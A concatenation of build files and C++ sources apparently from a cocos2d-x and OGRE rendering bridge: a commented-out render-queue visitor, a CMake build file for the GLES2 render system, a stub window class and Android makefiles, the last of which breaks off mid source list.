    indexCount      = state.indexCount;
    operationType   = state.operationType;
    // Transform, blending and cocos2d rendering objects (glProgramState is
    // a shared pointer copy, not a deep clone — same as the original).
    mat4           = state.mat4;
    blend          = state.blend;
    meshCommand    = state.meshCommand;
    glProgramState = state.glProgramState;
}
/*class QueueVisitor : public RenderQueue
{
public:
virtual ~QueueVisitor(){};
QueueVisitor():mCurProtocol(NULL){}
void _visitor(Ogre::SceneNode *node)
{
SceneNode::ObjectIterator objs = node->getAttachedObjectIterator();
while (objs.hasMoreElements())
{
MovableObject* mobj = objs.getNext();
mobj->_updateRenderQueue(this);
}
SceneNode::ChildNodeIterator children = node->getChildIterator();
while (children.hasMoreElements())
{
this->_visitor(static_cast<SceneNode*>(children.getNext()));
}
}
void visitor(cocos2d::NodeProtocol *protocol)
{
mCurProtocol = protocol;
protocol->_update(true,true);
_visitor(protocol);
protocol->_update(true,true);
mCurProtocol = NULL;
}
virtual void addRenderable(Renderable* pRend, uint8 groupID, ushort priority)
{
Technique* pTech;
// tell material it's been used
if (!pRend->getMaterial().isNull())
pRend->getMaterial()->touch();
// Check material & technique supplied (the former since the default implementation
// of getTechnique is based on it for backwards compatibility
if(pRend->getMaterial().isNull() || !pRend->getTechnique())
{
// Use default base white
MaterialPtr baseWhite = MaterialManager::getSingleton().getByName("BaseWhite");
pTech = baseWhite->getTechnique(0);
}
else
pTech = pRend->getTechnique();
if (mRenderableListener)
{
// Allow listener to override technique and to abort
if (!mRenderableListener->renderableQueued(pRend, groupID, priority,
&pTech, this))
return; // rejected
// tell material it's been used (incase changed)
pTech->getParent()->touch();
}
bool isTransparent = false;
if (pTech->isTransparentSortingForced() ||
(pTech->isTransparent() &&
(!pTech->isDepthWriteEnabled() ||
!pTech->isDepthCheckEnabled() ||
pTech->hasColourWriteDisabled())))
{
if (pTech->isTransparentSortingEnabled())
isTransparent = true;
}
else
{
//Technique::PassIterator pi = pTech->getPassIterator();
//
//while (pi.hasMoreElements())
//{
// _render(pRend, pi.getNext(),false);
//}
}
Technique::PassIterator pi = pTech->getPassIterator();
while (pi.hasMoreElements())
{
_render(pRend, pi.getNext(),isTransparent);
}
}
void _render(Renderable *rend,const Pass *pass,bool isTransport)
{
MeshStateMap &stateMap = mCurProtocol->getRenderStates();
MeshStateMap::iterator stateItor = stateMap.find(rend);
RenderState *renderState;
Ogre::RenderOperation ro;
rend->preRender(OgreManager::getInstance()->getSceneManager(), OgreManager::getInstance()->getRenderSystem());
rend->getRenderOperation(ro);
if(stateItor != stateMap.end())
{
renderState = &stateItor->second;
_refreshVectexBufferId(ro,renderState->vertexBufferId);
}
else
{
stateMap[rend] = RenderState();
stateItor = stateMap.find(rend);
renderState = &stateItor->second;
//create and set our custom shader
auto shader =GLProgram::createWithFilenames("cylinder.vert","cylinder.frag");
renderState->glProgramState = GLProgramState::create(shader);
CC_SAFE_RETAIN(renderState->glProgramState);
// cylinder->setGLProgramState(_state);
//auto glProgram =cocos2d::GLProgramCache::getInstance()->getGLProgram();
//renderState->glProgramState = cocos2d::GLProgramState::getOrCreateWithGLProgramName(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR);
_refreshProgramState(ro,renderState->glProgramState,renderState->vertexBufferId);
}
renderState->blend.src = pass->getSourceBlendFactor();
renderState->blend.dst = pass->getDestBlendFactor();
int tempCount = rend->getNumWorldTransforms();
if(tempCount > 0)
{
rend->getWorldTransforms(mTempXform);
renderState->mat4 = *((cocos2d::Mat4*)mTempXform);
}
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
pTex->_prepare();
//if (pTex->hasViewRelativeTextureCoordinateGeneration())
//{
// mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
//}
//++unit;
BridgeTexturePtr textP = BridgeTexturePtr(pTex->_getTexturePtr());
if(!textP.isNull())
{
renderState->textureId = textP->getGLID();
}
}
if (ro.useIndexes)
{
renderState->_visible = true;
renderState->indexBufferId = static_cast<BridgeHardwareIndexBuffer*>(ro.indexData->indexBuffer.get())->getGLBufferId();
renderState->indexBufferType = ro.indexData->indexBuffer->getType();
renderState->operationType = ro.operationType;
renderState->indexCount = ro.indexData->indexCount;
renderState->isTransparent = isTransport;
renderState->isDepthTestEnabled = pass->getDepthCheckEnabled();
renderState->isDepthWriteEnabled = pass->getDepthWriteEnabled();
}
}
void _refreshVectexBufferId(RenderOperation &ro,GLuint &bufferId)
{
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem,elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
}
}
void _refreshProgramState(RenderOperation &ro,cocos2d::GLProgramState *state,GLuint &bufferId)
{
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem, elemEnd;
elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
pBufferData = ((char *)NULL + (elem->getOffset())) ;
if (ro.vertexData->vertexStart)
{
pBufferData = static_cast<char*>(pBufferData)+ro.vertexData->vertexStart * vertexBuffer->getVertexSize();
}
GLenum type = 0;
GLsizei size = 0;
GLboolean normalised = GL_FALSE;
const char* attribute_name = NULL;
switch(elem->getType())
{
case VET_FLOAT1:
type = GL_FLOAT;
size = 1;
normalised = GL_FALSE;
break;
case VET_FLOAT2:
type = GL_FLOAT;
size = 2;
normalised = GL_FALSE;
break;
case VET_FLOAT3:
type = GL_FLOAT;
size = 3;
normalised = GL_FALSE;
break;
case VET_FLOAT4:
type = GL_FLOAT;
size = 4;
normalised = GL_FALSE;
break;
case VET_SHORT1:
type = GL_SHORT;
size = 1;
normalised = GL_FALSE;
break;
case VET_SHORT2:
type = GL_SHORT;
size = 2;
normalised = GL_FALSE;
break;
case VET_SHORT3:
type = GL_SHORT;
size = 3;
normalised = GL_FALSE;
break;
case VET_SHORT4:
type = GL_SHORT;
size = 4;
normalised = GL_FALSE;
break;
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
case VET_UBYTE4:
size = 4;
normalised = GL_TRUE;
type = GL_UNSIGNED_BYTE;
break;
default:
break;
};
switch(elem->getSemantic())
{
case VES_POSITION:
attribute_name = "a_position";GLProgram::ATTRIBUTE_NAME_POSITION;
break;
case VES_BLEND_WEIGHTS:
attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_WEIGHT;
break;
case VES_BLEND_INDICES:
attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_INDEX;
break;
case VES_NORMAL:
attribute_name = "a_color"; GLProgram::ATTRIBUTE_NAME_NORMAL;
break;
case VES_DIFFUSE:
attribute_name = GLProgram::ATTRIBUTE_NAME_COLOR;
break;
//case VES_SPECULAR:
// break;
case VES_TEXTURE_COORDINATES:
attribute_name = "a_texCoord";GLProgram::ATTRIBUTE_NAME_TEX_COORD;
break;
//case VES_BINORMAL:
// break;
//case VES_TANGENT:
// break;
}
//int type = GLES2HardwareBufferManager::getGLType(elem->getType());
GLsizei stride = static_cast<GLsizei>(vertexBuffer->getVertexSize());
state->setVertexAttribPointer(attribute_name,
size,
type,
normalised,
stride,
(GLvoid*)pBufferData
);
}
}
protected:
Ogre::Matrix4 mTempXform[256];
bool mVisibleFlag;
MeshStateMap mMeshStates;
cocos2d::NodeProtocol *mCurProtocol;
};*/
}
/*
static Ogre::QueueVisitor *s_QueueVisitor = NULL;
NS_CC_BEGIN
NodeProtocol::NodeProtocol(Ogre::SceneManager * creator) :
Ogre::SceneNode(NULL)
{
if(NULL == s_QueueVisitor) //cannot crate this object before root
{
s_QueueVisitor = new Ogre::QueueVisitor();
}
}
NodeProtocol::NodeProtocol(Ogre::SceneManager * creator,const std::string &name) :
Ogre::SceneNode(NULL)
{
if(NULL == s_QueueVisitor) //cannot crate this object before root
{
s_QueueVisitor = new Ogre::QueueVisitor();
}
}
NodeProtocol::~NodeProtocol()
{
}
void NodeProtocol::setCocosMatrix4(const cocos2d::Mat4 &mat)
{
cocos2d::Quaternion rotation;
cocos2d::Vec3 scale, translation;
mat.decompose(&scale, &rotation, &translation);
/*mCocosScale.x = scale.x;
mCocosScale.y = scale.y;
mCocosScale.z = scale.z;
mCocosPosition.x = translation.x;
mCocosPosition.y = translation.y;
mCocosPosition.z = translation.z;
mCocosQuaternion.w = rotation.w;
mCocosQuaternion.x = rotation.x;
mCocosQuaternion.y = rotation.y;
mCocosQuaternion.z = rotation.z;*/
/*mDerivedScale.x = scale.x;
mDerivedScale.y = scale.y;
mDerivedScale.z = scale.z;
mDerivedPosition.x = translation.x;
mDerivedPosition.y = translation.y;
mDerivedPosition.z = translation.z;
mDerivedOrientation.w = rotation.w;
mDerivedOrientation.x = rotation.x;
mDerivedOrientation.y = rotation.y;
mDerivedOrientation.z = rotation.z;
//needUpdate();
}
MeshStateMap &NodeProtocol::getRenderStates()
{
return mRenderStateMap;
}
void NodeProtocol::updateRenderQueue()
{
s_QueueVisitor->visitor(this);
}
const Ogre::Vector3 & NodeProtocol::_getDerivedScale(void) const
{
return mCocosScale;
}
const Ogre::Vector3 & NodeProtocol::_getDerivedPosition(void) const
{
return mCocosPosition;
}
const Ogre::Quaternion & NodeProtocol::_getDerivedOrientation(void) const
{
return mCocosQuaternion;
}
Ogre::Node* NodeProtocol::createChildImpl(void)
{
return new NodeProtocol(NULL);
}
Ogre::Node* NodeProtocol::createChildImpl(const Ogre::String& name)
{
return createChildImpl();
}
NS_CC_END*/<file_sep>#-------------------------------------------------------------------
# This file is part of the CMake build system for OGRE
# (Object-oriented Graphics Rendering Engine)
# For the latest info, see http://www.ogre3d.org/
#
# The contents of this file are placed in the public domain. Feel
# free to make use of it in any way you like.
#-------------------------------------------------------------------
# Configure OpenGL ES 2.0 RenderSystem build
set(HEADER_FILES
include/OgreGLES2Context.h
include/OgreGLES2DefaultHardwareBufferManager.h
include/OgreGLES2DepthBuffer.h
include/OgreGLES2FBOMultiRenderTarget.h
include/OgreGLES2FBORenderTexture.h
include/OgreGLES2FrameBufferObject.h
include/OgreGLES2GpuProgram.h
include/OgreGLES2GpuProgramManager.h
include/OgreGLES2HardwareBufferManager.h
include/OgreGLES2HardwareIndexBuffer.h
include/OgreGLES2HardwareOcclusionQuery.h
include/OgreGLES2HardwarePixelBuffer.h
include/OgreGLES2HardwareVertexBuffer.h
include/OgreGLES2PixelFormat.h
include/OgreGLES2Plugin.h
include/OgreGLES2Prerequisites.h
include/OgreGLES2RenderSystem.h
include/OgreGLES2RenderTexture.h
include/OgreGLES2Support.h
include/OgreGLES2Texture.h
include/OgreGLES2TextureManager.h
)
set(SOURCE_FILES
src/OgreGLES2Context.cpp
src/OgreGLES2DefaultHardwareBufferManager.cpp
src/OgreGLES2DepthBuffer.cpp
src/OgreGLES2EngineDll.cpp
src/OgreGLES2FBOMultiRenderTarget.cpp
src/OgreGLES2FBORenderTexture.cpp
src/OgreGLES2FrameBufferObject.cpp
src/OgreGLES2GpuProgram.cpp
src/OgreGLES2GpuProgramManager.cpp
src/OgreGLES2HardwareBufferManager.cpp
src/OgreGLES2HardwareIndexBuffer.cpp
src/OgreGLES2HardwareOcclusionQuery.cpp
src/OgreGLES2HardwarePixelBuffer.cpp
src/OgreGLES2HardwareVertexBuffer.cpp
src/OgreGLES2PixelFormat.cpp
src/OgreGLES2Plugin.cpp
src/OgreGLES2RenderSystem.cpp
src/OgreGLES2RenderTexture.cpp
src/OgreGLES2Support.cpp
src/OgreGLES2Texture.cpp
src/OgreGLES2TextureManager.cpp
)
set(GLSLES_FILES
src/GLSLES/include/OgreGLSLESExtSupport.h
src/GLSLES/include/OgreGLSLESGpuProgram.h
src/GLSLES/include/OgreGLSLESLinkProgram.h
src/GLSLES/include/OgreGLSLESLinkProgramManager.h
src/GLSLES/include/OgreGLSLESPreprocessor.h
src/GLSLES/include/OgreGLSLESProgram.h
src/GLSLES/include/OgreGLSLESProgramCommon.h
src/GLSLES/include/OgreGLSLESProgramFactory.h
src/GLSLES/include/OgreGLSLESProgramManagerCommon.h
src/GLSLES/include/OgreGLSLESProgramPipeline.h
src/GLSLES/include/OgreGLSLESProgramPipelineManager.h
src/GLSLES/src/OgreGLSLESExtSupport.cpp
src/GLSLES/src/OgreGLSLESGpuProgram.cpp
src/GLSLES/src/OgreGLSLESLinkProgram.cpp
src/GLSLES/src/OgreGLSLESLinkProgramManager.cpp
src/GLSLES/src/OgreGLSLESPreprocessor.cpp
src/GLSLES/src/OgreGLSLESProgram.cpp
src/GLSLES/src/OgreGLSLESProgramCommon.cpp
src/GLSLES/src/OgreGLSLESProgramFactory.cpp
src/GLSLES/src/OgreGLSLESProgramManagerCommon.cpp
src/GLSLES/src/OgreGLSLESProgramPipeline.cpp
src/GLSLES/src/OgreGLSLESProgramPipelineManager.cpp
)
if (OGRE_CONFIG_ENABLE_GLES2_CG_SUPPORT)
# Prepend the Cg program sources to the GLSL ES file list when Cg
# support is enabled (the existing list is re-appended after them).
set(GLSLES_FILES
src/GLSLES/src/OgreGLSLESCgProgram.cpp
src/GLSLES/src/OgreGLSLESCgProgramFactory.cpp
${GLSLES_FILES}
)
endif (OGRE_CONFIG_ENABLE_GLES2_CG_SUPPORT)
set(PLATFORM_HEADERS
include/common/OgreCommonWindow.h
include/common/OgreCommonGLSupport.h
include/common/OgreCommonGLContext.h
)
set(PLATFORM_SOURCES
src/common/OgreCommonWindow.cpp
src/common/OgreCommonGLSupport.cpp
src/common/OgreCommonGLContext.cpp
)
include_directories("../include")
include_directories("../ogre_main/include")
include_directories("include")
include_directories("include/common")
include_directories("src/GLSLES/include")
include_directories("../../../cocos")
# Add platform specific files
# Per-platform include paths, link libraries and header install folder.
if (OGRE_BUILD_PLATFORM_NACL)
# Native Client: link against 'nosys'; install headers under NaCl/.
set(PLATFORM_LIBS nosys)
set(PLATFORM_HEADER_INSTALL "NaCl")
elseif (WIN32)
# Windows: cocos2d win32 platform layer, freetype and the OpenGL ES
# emulation headers. NOTE(review): no PLATFORM_LIBS is set on this
# branch — confirm that is intentional.
include_directories("../../../cocos/platform/win32")
include_directories("../../../external/freetype2/include/win32")
include_directories("../../../external/win32-specific/gles/include/OGLES")
set(PLATFORM_HEADER_INSTALL "WIN32")
elseif (APPLE)
if (OGRE_BUILD_PLATFORM_APPLE_IOS)
# iOS: platform headers plus the iOS freetype build.
include_directories("include/iOS")
include_directories("../../../cocos/platform/ios")
include_directories("../../../external/freetype2/include/ios")
set(PLATFORM_LIBS "")
set(PLATFORM_HEADER_INSTALL "iOS")
else ()
# macOS (OSX) desktop build.
include_directories("include/OSX")
include_directories("../../../cocos/platform/mac")
include_directories("../../../external/freetype2/include/mac")
set(PLATFORM_LIBS "")
set(PLATFORM_HEADER_INSTALL "OSX")
endif ()
elseif (UNIX)
# Other UNIX (Linux): GLX windowing headers are installed.
include_directories("../../../cocos/platform/linux")
include_directories("../../../external/freetype2/include/linux")
set(PLATFORM_LIBS "")
set(PLATFORM_HEADER_INSTALL "GLX")
endif()
# Build the GLES2 render system as a static library from the core, GLSL ES
# and platform-specific sources. NOTE(review): HEADER_FILES / GLSLES header
# lists and PLATFORM_HEADERS are defined above but never attached to the
# target — confirm whether they were meant to be added (e.g. for IDEs).
add_library(ogre_rendersystem STATIC
${SOURCE_FILES}
${GLSLES_FILES}
${PLATFORM_SOURCES}
)
# Collect all library artifacts under <build>/lib.
set_target_properties(ogre_rendersystem
PROPERTIES
ARCHIVE_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
LIBRARY_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
)
<file_sep>
#ifndef __BERYL_ScheduleAction_H__
#define __BERYL_ScheduleAction_H__
#include "3d/CCAnimation3D.h"
#include "base/ccMacros.h"
#include "base/CCRef.h"
#include "2d/CCActionInterval.h"
NS_CC_BEGIN
class ScriptCallFuncHelper;
/**
 * Interval action that drives a ScriptCallFuncHelper over its duration
 * (see update()). The previous comment ("Inherit from Sprite, achieve
 * BillBoard") was copy-pasted from an unrelated class.
 */
class ScheduleAction : public ActionInterval
{
public:
    /** creates the action with duration @p d and the script helper to drive. */
    static ScheduleAction* create(float d,ScriptCallFuncHelper *helper);
    /** Two-step initializer (cocos2d convention); stores the helper and duration. */
    bool initWithAction(float d,ScriptCallFuncHelper *helper);
    //
    // Overrides
    //
    virtual void update(float time) override;
    virtual ScheduleAction* reverse() const override;
    virtual ScheduleAction* clone() const override;
CC_CONSTRUCTOR_ACCESS:
    ScheduleAction();
    virtual ~ScheduleAction();
protected:
    // Script callback used during update(); ownership/retain semantics live
    // in the .cpp — TODO(review) confirm it is retained/released there.
    ScriptCallFuncHelper *mScriptHelper;
private:
    CC_DISALLOW_COPY_AND_ASSIGN(ScheduleAction);
};
NS_CC_END
#endif // __BERYL_ScheduleAction_H__
<file_sep>/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2012 Tor<NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-----------------------------------------------------------------------------
*/
#include "OgreRoot.h"
#include "OgreException.h"
#include "OgreLogManager.h"
#include "OgreStringConverter.h"
#include "OgreWindowEventUtilities.h"
#include "OgreBridgeWindow.h"
namespace Ogre {
// A bridge window starts in the "closed" state; create() opens it.
BridgeWindow::BridgeWindow()
:mClosed(true)
{
}
// No native resources are owned here, so there is nothing to release.
BridgeWindow::~BridgeWindow()
{
}
// Repositioning is not supported by this window; the call is only logged.
void BridgeWindow::reposition( int left, int top )
{
    LogManager::getSingleton().logMessage("\treposition called");
}
// Resizing is not supported; mWidth/mHeight are NOT updated, only logged.
void BridgeWindow::resize(uint width, uint height)
{
    LogManager::getSingleton().logMessage("\tresize called");
}
// Notification hook; this implementation only logs and changes no state.
void BridgeWindow::windowMovedOrResized()
{
    LogManager::getSingleton().logMessage("\twindowMovedOrResized called");
}
// This render target never requires flipped texture coordinates.
bool BridgeWindow::requiresTextureFlipping() const
{
    return false;
}
// Frame-buffer read-back is not implemented for the bridge window (no-op
// stub); callers receive an unmodified 'dst'.
void BridgeWindow::copyContentsToMemory(const PixelBox &dst, FrameBuffer buffer)
{
}
// Logs only; note that mClosed/mActive are NOT changed here — TODO(review)
// confirm whether destroy() should also mark the window closed.
void BridgeWindow::destroy(void)
{
    LogManager::getSingleton().logMessage("\tdestroy called");
}
// True until create() has been called (and after, only if mClosed is reset).
bool BridgeWindow::isClosed(void) const
{
    return mClosed;
}
// Records the requested parameters for this window and marks it open/active.
// No native surface is created here; 'fullScreen' and 'miscParams' are
// ignored by the bridge implementation.
void BridgeWindow::create(const String& name, uint width, uint height,
    bool fullScreen, const NameValuePairList *miscParams)
{
    LogManager::getSingleton().logMessage("\tcreate called");
    mName = name;
    // Geometry: anchored at the origin with the requested dimensions.
    mLeft = 0;
    mTop = 0;
    mWidth = width;
    mHeight = height;
    // The window becomes usable immediately.
    mClosed = false;
    mActive = true;
    //mVisible = true;
}
}<file_sep>LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)

LOCAL_MODULE := encapsulation_static
LOCAL_MODULE_FILENAME := libencapsulation

# ogre_rendersystem
LOCAL_OGRE_COCOS_INCLUDE := \
    $(LOCAL_PATH)/ogre

# Bridge + extension sources.
# FIX 1: removed the duplicate OgreBridgeSceneManager.cpp entry (it was
# listed twice, which compiles/links the object twice).
# FIX 2: removed the trailing backslash after the last source, which made
# GNU make splice the following LOCAL_EXPORT_C_INCLUDES assignment into
# this source list instead of executing it.
LOCAL_OGRE_COCOS_SRC_FILES := \
    ogre/OgreOgreSprite3D.cpp \
    ogre/OgreParticleSprite3D.cpp \
    ogre/OgreOgreManager.cpp \
    ogre/OgreNodeProtocol.cpp \
    ogre/components/OgreBridgeSceneManager.cpp \
    ogre/components/OgreBridgeFileSystemArchive.cpp \
    ogre/components/OgreBridgeGpuProgram.cpp \
    ogre/components/OgreBridgeGpuProgramManager.cpp \
    ogre/components/OgreBridgeImageCodec.cpp \
    ogre/components/OgreBridgeRenderSystem.cpp \
    ogre/components/OgreBridgeBufferManager.cpp \
    ogre/components/OgreBridgeTextureManager.cpp \
    ogre/components/OgreBridgeRenderSystemPlugin.cpp \
    ogre/components/OgreBridgeWindow.cpp \
    extension/GroupNode3D.cpp \
    extension/CameraBillBoard.cpp \
    extension/BonesAnimate3D.cpp \
    extension/ScheduleAction.cpp \
    extension/ScriptCallFuncHelper.cpp

# Include paths exported to dependents.
LOCAL_EXPORT_C_INCLUDES :=
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/ogre
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/extension

LOCAL_C_INCLUDES :=
LOCAL_C_INCLUDES += $(LOCAL_OGRE_COCOS_INCLUDE)

LOCAL_SRC_FILES :=
LOCAL_SRC_FILES += $(LOCAL_OGRE_COCOS_SRC_FILES)

LOCAL_WHOLE_STATIC_LIBRARIES := cocos2dx_static
LOCAL_WHOLE_STATIC_LIBRARIES += ogremain_static
LOCAL_WHOLE_STATIC_LIBRARIES += particlefx_static
LOCAL_WHOLE_STATIC_LIBRARIES += universe_static

include $(BUILD_STATIC_LIBRARY)

$(call import-module,.)
$(call import-module,../third_party/ogre/ogre_main)
$(call import-module,../third_party/ogre/ogre_particlefx)
$(call import-module,../third_party/ogre/ogre_pu)<file_sep>LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)

# Particle Universe plugin, built as a static library.
LOCAL_MODULE := universe_static
LOCAL_MODULE_FILENAME := libuniverse

# ogre_pu
# Public include directories for the Particle Universe headers.
LOCAL_OGRE_PARTICLE_UNIVERSE_INCLUDE := \
$(LOCAL_PATH)/include \
$(LOCAL_PATH)/include/Externs \
$(LOCAL_PATH)/include/ParticleAffectors \
$(LOCAL_PATH)/include/ParticleBehaviours \
$(LOCAL_PATH)/include/ParticleEmitters \
$(LOCAL_PATH)/include/ParticleEventHandlers \
$(LOCAL_PATH)/include/ParticleRenderers
LOCAL_OGRE_PARTICLE_UNIVERSE_SRC_FILES := \
src/ParticleUniverseAffector.cpp \
src/ParticleUniverseAffectorTokens.cpp \
src/ParticleUniverseAliasTokens.cpp \
src/ParticleUniverseAtlasImage.cpp \
src/ParticleUniverseAttachable.cpp \
src/ParticleUniverseAttachableTokens.cpp \
src/ParticleUniverseBehaviourTokens.cpp \
src/ParticleUniverseCameraDependency.cpp \
src/ParticleUniverseCameraDependencyTokens.cpp \
src/ParticleUniverseDll.cpp \
src/ParticleUniverseDynamicAttribute.cpp \
src/ParticleUniverseDynamicAttributeTokens.cpp \
src/ParticleUniverseEmitter.cpp \
src/ParticleUniverseEmitterTokens.cpp \
src/ParticleUniverseEventHandlerTokens.cpp \
src/ParticleUniverseExtern.cpp \
src/ParticleUniverseExternTokens.cpp \
src/ParticleUniverseForceField.cpp \
src/ParticleUniverseNoise.cpp \
src/ParticleUniverseObserver.cpp \
src/ParticleUniverseObserverTokens.cpp \
src/ParticleUniverseParticle.cpp \
src/ParticleUniverseParticlePool.cpp \
src/ParticleUniversePCH.cpp \
src/ParticleUniversePlugin.cpp \
src/ParticleUniverseRenderer.cpp \
src/ParticleUniverseRendererTokens.cpp \
src/ParticleUniverseScriptDeserializer.cpp \
src/ParticleUniverseScriptSerializer.cpp \
src/ParticleUniverseSystem.cpp \
src/ParticleUniverseSystemManager.cpp \
src/ParticleUniverseSystemManagerTokens.cpp \
src/ParticleUniverseSystemTokens.cpp \
src/ParticleUniverseTechnique.cpp \
src/ParticleUniverseTechniqueTokens.cpp \
src/ParticleUniverseVisualParticle.cpp \
src/ParticleEmitters/ParticleUniverseBoxEmitter.cpp \
src/ParticleEmitters/ParticleUniverseBoxEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseCircleEmitter.cpp \
src/ParticleEmitters/ParticleUniverseCircleEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseLineEmitter.cpp \
src/ParticleEmitters/ParticleUniverseLineEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseMeshSurfaceEmitter.cpp \
src/ParticleEmitters/ParticleUniverseMeshSurfaceEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniversePointEmitter.cpp \
src/ParticleEmitters/ParticleUniversePointEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniversePositionEmitter.cpp \
src/ParticleEmitters/ParticleUniversePositionEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseSlaveEmitter.cpp \
src/ParticleEmitters/ParticleUniverseSlaveEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseSphereSurfaceEmitter.cpp \
src/ParticleEmitters/ParticleUniverseSphereSurfaceEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseVertexEmitter.cpp \
src/ParticleEmitters/ParticleUniverseVertexEmitterTokens.cpp \
src/ParticleRenderers/ParticleUniverseBeamRenderer.cpp \
src/ParticleRenderers/ParticleUniverseBeamRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseBillboardRenderer.cpp \
src/ParticleRenderers/ParticleUniverseBillboardRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseBox.cpp \
src/ParticleRenderers/ParticleUniverseBoxRenderer.cpp \
src/ParticleRenderers/ParticleUniverseBoxRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseBoxSet.cpp \
src/ParticleRenderers/ParticleUniverseEntityRenderer.cpp \
src/ParticleRenderers/ParticleUniverseEntityRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseLightRenderer.cpp \
src/ParticleRenderers/ParticleUniverseLightRendererTokens.cpp \
src/ParticleRenderers/ParticleUniversePrimitiveShapeSet.cpp \
src/ParticleRenderers/ParticleUniverseRibbonTrailRenderer.cpp \
src/ParticleRenderers/ParticleUniverseRibbonTrailRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseSphere.cpp \
src/ParticleRenderers/ParticleUniverseSphereRenderer.cpp \
src/ParticleRenderers/ParticleUniverseSphereRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseSphereSet.cpp \
src/ParticleAffectors/ParticleUniverseAlignAffector.cpp \
src/ParticleAffectors/ParticleUniverseAlignAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseBaseCollider.cpp \
src/ParticleAffectors/ParticleUniverseBaseColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseBaseForceAffector.cpp \
src/ParticleAffectors/ParticleUniverseBaseForceAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseBoxCollider.cpp \
src/ParticleAffectors/ParticleUniverseBoxColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffector.cpp \
src/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseColourAffector.cpp \
src/ParticleAffectors/ParticleUniverseColourAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseFlockCenteringAffector.cpp \
src/ParticleAffectors/ParticleUniverseFlockCenteringAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseForceFieldAffector.cpp \
src/ParticleAffectors/ParticleUniverseForceFieldAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseGeometryRotator.cpp \
src/ParticleAffectors/ParticleUniverseGeometryRotatorTokens.cpp \
src/ParticleAffectors/ParticleUniverseGravityAffector.cpp \
src/ParticleAffectors/ParticleUniverseGravityAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseInterParticleCollider.cpp \
src/ParticleAffectors/ParticleUniverseInterParticleColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseJetAffector.cpp \
src/ParticleAffectors/ParticleUniverseJetAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseLineAffector.cpp \
src/ParticleAffectors/ParticleUniverseLineAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseLinearForceAffector.cpp \
